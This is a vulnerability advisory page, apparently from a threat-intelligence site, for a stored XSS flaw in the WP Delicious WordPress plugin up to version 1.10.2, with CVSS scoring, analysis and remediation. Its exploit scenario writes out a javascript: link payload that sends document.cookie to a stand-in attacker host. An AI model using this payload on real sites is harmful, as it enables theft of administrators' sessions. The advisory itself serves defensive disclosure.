Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
UI:R corrects the provided UI:N - description explicitly requires victim to click the link; PR:L confirmed by Contributor-level requirement; S:C reflects XSS executing in victim browser context.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The Delicious Recipes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'steps' block attribute in versions up to, and including, 1.10.2. This is due to insufficient input sanitization and output escaping in the wrap_direction_text() function, which interpolates the user-supplied href value from nested link nodes ($node['props']['href']) directly into an anchor tag via sprintf() at line 1627 without esc_url() or any URL scheme validation. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts (including javascript: URIs) in pages that will execute whenever a user (such as an editor or administrator previewing the pending post) accesses an injected page and clicks the malicious link.
AnalysisAI
Stored cross-site scripting in the WP Delicious (formerly Delicious Recipes) WordPress plugin versions up to and including 1.10.2 allows authenticated Contributor-level users to inject arbitrary JavaScript via unsanitized javascript: URIs embedded in recipe step link attributes. The wrap_direction_text() function interpolates attacker-controlled href values directly into anchor tags using sprintf() without invoking WordPress's esc_url(), enabling payload execution in the browser of any privileged user who clicks the poisoned link while previewing or viewing the affected recipe post. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to hold at minimum a Contributor-level authenticated account on the target WordPress site - anonymous or Subscriber-level access is insufficient. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The NVD-assigned CVSS 3.1 score of 6.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) contains a material discrepancy: the UI:N metric asserts no user interaction is required, but the CVE description explicitly states that payload execution depends on a privileged user clicking the malicious anchor link. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A Contributor-level account holder on a multi-author WordPress food blog creates a new recipe post and, using the Gutenberg block editor, inserts a recipe step block containing a link whose `href` is set to `javascript:document.location='https://attacker.com/?c='+document.cookie`. The post is submitted for review, and when an administrator or editor opens the pending draft to approve it and clicks the anchor in the rendered recipe card, the script executes in their browser session, exfiltrating their WordPress authentication cookies to the attacker's server. … |
| Remediation | Upgrade the WP Delicious plugin to the version incorporating WordPress SVN changeset 3605415, which represents the upstream fix committed to the plugin repository and is viewable at https://plugins.trac.wordpress.org/changeset/3605415/delicious-recipes. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-44883
GHSA-pqvj-2p97-rfr5